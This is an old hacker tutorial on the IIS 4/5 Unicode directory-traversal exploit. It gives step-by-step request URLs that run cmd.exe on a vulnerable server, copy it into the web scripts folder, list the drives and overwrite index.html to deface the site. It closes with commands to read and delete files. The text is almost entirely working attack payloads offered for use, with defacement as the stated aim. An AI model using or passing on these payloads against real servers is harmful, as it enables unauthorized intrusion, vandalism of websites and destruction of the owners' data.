UNICODE EXPLOIT IIS 4 + 5

(441 total words in this text)
(3 reads)   




UNICODE EXPLOIT IIS 4 + 5
________________________________


18-4-01=This Tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|=======
========do not change this tutorial without permission from me============
===============for qeustions mail to:===============
Contact 
Secure Logics 


--------------------------------------------------------------------------------
The subject about this tutorial is the UNICODE IIS4 + 5 Exploit..
NOTE : You can use unicodexecute2.pl in combination with activeperl
or use your webbrowser.
----------------------------------------------------------------------------------

Do you use windows than is Grinder  a handy program to scan for webservers.

-----------------------------------------------------------------------------------
- Allright let's begin..

- the ip that we use for this example iss 127.0.0.1

------------------------------------------------------------------------------------

1 ...... 127.0.0.1 must be vulnerable for the exploit..

so we type this commando in our webbrowser :



http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:


When you see te index of drive c:

than he's vulnerable..

First check or the directory c:Inetpubwwwroot

you do that like this

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:Inetpubwwwroot

and c:winntsystem32

you do that like this

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:winntsystem32

exists.

-------------------------------------------------------------------------------------

2........ Than you must copy cmd.exe from c:winntsystem32 to c:Inetpubscripts

You do that with the following command.

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe%20c:Inetpubscriptscmds.exe


when the directory Inetpub/Scripts exist on another drive for example e:

then you must type

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:winntsystem32cmd.exe%20e:Inetpubscriptscmds.exe

When you have done this, you are ready to do anything what you want to.

Buttt when you get the message

"acces is denied" then the server is patched...and than you have to take another one.

-----------------------------------------------------------------------------------------

3...... Now you have to go to the directory where the page is..


when Inetpubwwwroot exist on c: then you have to type this :

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:Inetpubwwwroot

or on e: http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:Inetpubwwwroot

-----------------------------------------------------------------------------------------

4...... when you see the html wich you want to deface..as example index.html

Then you need to type this :

http://127.0.0.1/scripts/cmds.exe?+/c+echo+YOUR TEXT+>+c:Inetpubwwwrootindex.html

Now he will write the rule "YOUR TEXT" to index.html

and when you open your browser and type

http://127.0.0.1

you will see your rule instead of the webpage :)))

And you are ready !! butt don't change to much ... 

And send an email to the webmaster that he must update his sever....

-------------------------------------------------------------------------------------------

You can do also other thing like .. make a directory ...

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+mkdir+0wn3D_By_THxZ0NE

------------ or when you want to look att drive d: or e: or F:

you need to type this 


http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+d:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:

http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+f:


-------------
Open a textfile as example zone.txt on the drive c:

http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+type+c:zone.txt



18-4-01=This Tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|=======
========do not change this tutorial without permission from me============
===============for qeustions mail to:===============
Contact 
Secure Logics 


_________________________________________
- Some Commando's

echo: upload

dir+c: Look at the files on harddisk c:
del+c:thxzone.txt means that you delete the file thxzone.txt on drive c:

    Source: geocities.com/eljehad1/se

               ( geocities.com/eljehad1)